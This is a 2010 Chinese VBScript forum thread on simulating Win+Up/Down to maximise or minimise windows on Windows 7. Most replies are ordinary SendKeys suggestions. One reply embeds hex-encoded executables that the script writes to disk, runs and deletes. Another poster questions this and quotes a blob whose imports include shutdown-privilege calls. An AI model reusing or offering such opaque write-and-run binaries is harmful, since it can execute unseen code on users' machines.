发送最大化最小化vbs怎样写?

sddffgreyeuuue 2010-06-23 08:30:03
最大化:win + ↑

最小化:win + ↓
发送最大化最小化vbs怎样写?
...全文
660 22 打赏 收藏 转发到动态 举报
写回复
用AI写文章
22 条回复
切换为时间正序
请发表友善的回复…
发表回复
Microogle 2010-12-30
  • 打赏
  • 举报
回复
OD一下,你就知道。
Endoresu 2010-12-30
  • 打赏
  • 举报
回复
[Quote=引用 20 楼 microogle 的回复:]

引用 19 楼 endoresu 的回复:

17L是什么东西,一个生成up和down的可执行程序并运行的脚本,你要干什么?
引用 17 楼 microogle 的回复:

懒得手工给你压缩了:
VBScript code

s1="4D5A90000300000004000000FFFF0000B8000000" _
+"000000004000000000000000000……
[/Quote]

你这个十六进制代码谁知道是什么,你知道
strCode = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000B80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000038195D297C78337A7C78337A7C78337AF267207A6978337A8058217A7D78337A526963687C78337A00000000000000000000000000000000504500004C010300C1CC194D0000000000000000E0000F010B01050C000200000004000000000000001000000010000000200000000040000010000000020000040000000000000004000000000000000040000000040000000000000200000000001000001000000000100000100000000000001000000000000000000000004020000064000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000400000000000000000000000000000000000000000000000000000002E7465787400000000020000001000000002000000040000000000000000000000000000200000602E72646174610000E8010000002000000002000000060000000000000000000000000000400000402E6461746100000050000000003000000002000000080000000000000000000000000000400000C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000E8B9010000A33430400068383040006A28FF3534304000E8CC010000684430400068203040006A00E8B5010000C7054030400001000000C7054C304000020000006A006A006A0068403040006A00FF3538304000E8830100006A00E894010000683C30400068103040006A016A006800304000E87601000068804F1200E8420100008B353C3040008B36FF353C304000FF96A4000000FF353C304000FF5608E8560100006A026870F10000681201000068FFFF0000E81C01000068C8000000E8000100006A10E8050100006AFF6870F10000681201000068FFFF0000E8F50000006858020000E8D90000006A026870F10000681201000068FFFF0000E8D500000068F4010000E8B90000006AFF6870F10000681201000068FFFF0000E8B500000068F4010000E8990000006A026870F10000681201000068FFFF0000E89500000068F4010000E8790000006AFF6870F10000681201000068FFFF0000E87500000068D0070000E8590000006A026870F10000681201000068FFFF0000E8550000006860EA0000E8390000006A026870F10000681201000068FFFF0000E8350000006A10E8280000006A006A0DE8190000006A00E800000000FF2518204000FF2514204000FF2510204000FF2530204000FF2534204000FF2538204000FF2508204000FF2500204000FF2504204000FF2528204000FF2524204000FF25202040006E21000086210000562100000000000006210000F2200000E420000000000000CC210000BC210000A8210000000000001C2100002C2100003A21000000000000B420000000000000000000000E21000010200000D420000000000000000000004A21000030200000A420000000000000000000009A21000000200000C42000000000000000000000DE2100002020000000000000000000000000000000000000000000006E21000086210000562100000000000006210000F2200000E420000000000000CC210000BC210000A8210000000000001C2100002C2100003A210000000000009B004578697450726F6365737300000147657443757272656E7450726F6365737300BB02536C656570006B65726E656C33322E646C6C0000CE004578697457696E646F7773457800B0014D6573736167654265657000FD0153656E644D6573736167654100007573657233322E646C6C0000190041646A757374546F6B656E50726976696C656765730041014C6F6F6B757050726976696C65676556616C7565410098014F70656E50726F63657373546F6B656E000061647661706933322E646C6C00000F00436F437265617465496E7374616E636500003800436F496E697469616C697A6500006400436F556E696E697469616C697A6500006F6C6533322E646C6C000000000000000000000000000000000000000000000000002096701379C2CE11A49E4445535400002D4BD8EFCF4B9842BE25EB542A59FBDA536553687574646F776E50726976696C6567650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
是什么吗?
Microogle 2010-12-30
  • 打赏
  • 举报
回复
[Quote=引用 19 楼 endoresu 的回复:]

17L是什么东西,一个生成up和down的可执行程序并运行的脚本,你要干什么?
引用 17 楼 microogle 的回复:

懒得手工给你压缩了:
VBScript code

s1="4D5A90000300000004000000FFFF0000B8000000" _
+"0000000040000000000000000000000000000000" _
+"00000……
[/Quote]
小白来了,5次API调用往19L飞去,一会排成S形,一会排成B形.
Endoresu 2010-12-29
  • 打赏
  • 举报
回复
17L是什么东西,一个生成up和down的可执行程序并运行的脚本,你要干什么?
[Quote=引用 17 楼 microogle 的回复:]

懒得手工给你压缩了:
VBScript code

s1="4D5A90000300000004000000FFFF0000B8000000" _
+"0000000040000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"B00000000E1FBA0E0……
[/Quote]
Endoresu 2010-12-29
  • 打赏
  • 举报
回复
呵呵,SendKeys方法没有{Win},具体你看MSDN就知道了:
http://msdn.microsoft.com/en-us/library/8c6yea83(VS.85).aspx
要用SendKeys方法模拟{Win},都要用Esc+Crtl,但是即使是这样模拟Win+Up都是不行的:
SendKeys "((^{ESC}){UP})"
所以纯VBS还是没办法 建议楼主换个思路
Microogle 2010-12-29
  • 打赏
  • 举报
回复
懒得手工给你压缩了:

s1="4D5A90000300000004000000FFFF0000B8000000" _
+"0000000040000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"B00000000E1FBA0E00B409CD21B8014CCD215468" _
+"69732070726F6772616D2063616E6E6F74206265" _
+"2072756E20696E20444F53206D6F64652E0D0D0A" _
+"24000000000000005D5C6DC1193D0392193D0392" _
+"193D0392972210921E3D0392E51D1192183D0392" _
+"52696368193D0392000000000000000050450000" _
+"4C0102006E361B4D0000000000000000E0000F01" _
+"0B01050C00020000000200000000000000100000" _
+"0010000000200000000040000010000000020000" _
+"0400000004000000040000000000000000300000" _
+"00020000C1510000020000000000100000100000" _
+"0000100000100000000000001000000000000000" _
+"00000000102000003C0000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000020000010000000" _
+"0000000000000000000000000000000000000000" _
+"000000002E746578740000004800000000100000" _
+"0002000000020000000000000000000000000000" _
+"200000602E726461746100009200000000200000" _
+"0002000000040000000000000000000000000000" _
+"4000004000000000000000006A006A006A006A5B" _
+"E82F0000006A006A006A006A"
s2 = "E8220000006A006A026A006A"
s3 ="E8150000006A006A026A006A5BE8" _
+"080000006A00E807000000CCFF2508204000FF25" _
+"0020400000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000076200000000000005C20000000000000" _
+"5420000000000000000000006A20000008200000" _
+"4C20000000000000000000008420000000200000" _
+"0000000000000000000000000000000000000000" _
+"76200000000000005C200000000000007B026B65" _
+"7962645F6576656E74007573657233322E646C6C" _
+"00009B004578697450726F63657373006B65726E" _
+"656C33322E646C6C000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"0000000000000000000000000000000000000000" _
+"00000000000000000000000000000000"
sUp = "26"
sDown = "28"
sExe1 = "up.exe"
sExe2 = "down.exe"

'Main
toFile s1 & sUp & s2 & sUp & s3,sExe1
toFile s1 & sDown & s2 & sDown & s3,sExe2
Set oShell = CreateObject("WScript.Shell")
oShell.Run sExe2
WScript.Sleep 3000
oShell.Run sExe1
oShell.Run "cmd /c del " & sExe1 & Space(1) & sExe2,0
'End
Sub toFile(s,f)
Set oStream = Createobject("Adodb.Stream")
Set oXML = Createobject("Microsoft.XMLDOM")
Set oElement = oXML.CreateElement("oTmpElement")
oElement.DataType = "bin.hex"
oElement.NodeTypedValue = s
With oStream
.Type = 1
.Mode = 3
.Open
.Write oElement.NodeTypedValue
.SaveToFile f
End With
oStream.Close
Set oStream = Nothing
Set oXML = Nothing
Set oElement = Nothing
End sub

sddffgreyeuuue 2010-12-29
  • 打赏
  • 举报
回复
win7系统下
window键+"↑"键是当前窗口最大化
window键+"↓"键是当前窗口最小化
我要的是模拟键盘按下window键+"↓"键
("{winup}"这个语句在win7通不过!)
Endoresu 2010-12-28
  • 打赏
  • 举报
回复
呵呵 VBS里不能单一让一个窗口变大或者变小
不过shell.application可以让整个屏幕的所有窗口都最小化
wscript.shell可以创建一个进程,创建时可以指定这个程序最初的窗口是最大化还是最小化还是隐藏

没有别的窗口控制了,楼主要什么功能说清楚 我是VBScript高手呵呵
sddffgreyeuuue 2010-12-27
  • 打赏
  • 举报
回复
2楼大概没用过win7吧
13搂的是所有以打开窗口最小化
也不是我想要的
txd159 2010-10-27
  • 打赏
  • 举报
回复
set WshShell = WScript. CreateObject("WScript.Shell")

wshshell.sendkeys "%+(' 'x)" '最大化窗口

wshshell.sendkeys "%+(' 'n)" '最小化窗口
Microogle 2010-10-27
  • 打赏
  • 举报
回复
思维僵化...
Set objshell = WScript.CreateObject("Shell.Application")
objshell.MinimizeAll'所有以打开窗口最小化
WScript.Sleep 1000
objshell.UndoMinimizeALL'取消所有以打开窗口最小化
sonic_andy 2010-10-02
  • 打赏
  • 举报
回复
最大化发送按键: alt+空格,x
最小化发送按键: alt+空格,n
浴火_凤凰 2010-09-29
  • 打赏
  • 举报
回复
[Quote=引用 6 楼 yangguo8013 的回复:]
set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.SendKeys "+{winup}"
WshShell.SendKeys "+{windown}"

你试试这个
[/Quote]

好像是Shift+上下吧
beg200710 2010-08-06
  • 打赏
  • 举报
回复
[Quote=引用 5 楼 theforever 的回复:]
[/Quote]

试试改改
z7026223 2010-08-05
  • 打赏
  • 举报
回复
niu 支持
幻想多巴胺 2010-08-03
  • 打赏
  • 举报
回复
[Quote=引用 6 楼 yangguo8013 的回复:]

set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.SendKeys "+{winup}"
WshShell.SendKeys "+{windown}"

你试试这个
[/Quote]
yangguo8013 2010-08-02
  • 打赏
  • 举报
回复
set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.SendKeys "+{winup}"
WshShell.SendKeys "+{windown}"

你试试这个
幻想多巴胺 2010-07-30
  • 打赏
  • 举报
回复
解决没,解决了发上来看 下。
  • 打赏
  • 举报
回复
[Quote=引用 4 楼 hongfu951 的回复:]
解决没,解决了发上来看 下。
[/Quote]
你看明白他意思了吗? 不妨替他解释一下。
不过楼主自己并没有进一步说明问题,恐怕也不一定会给这个帖结分了。
幻想多巴胺 2010-07-05
  • 打赏
  • 举报
回复
加载更多回复(2)

4,008

社区成员

发帖
与我相关
我的任务
社区描述
它是一种微软环境下的轻量级的解释型语言,它使用COM组件、WMI、WSH、ADSI访问系统中的元素,对系统进行管理。
社区管理员
  • vbScript社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧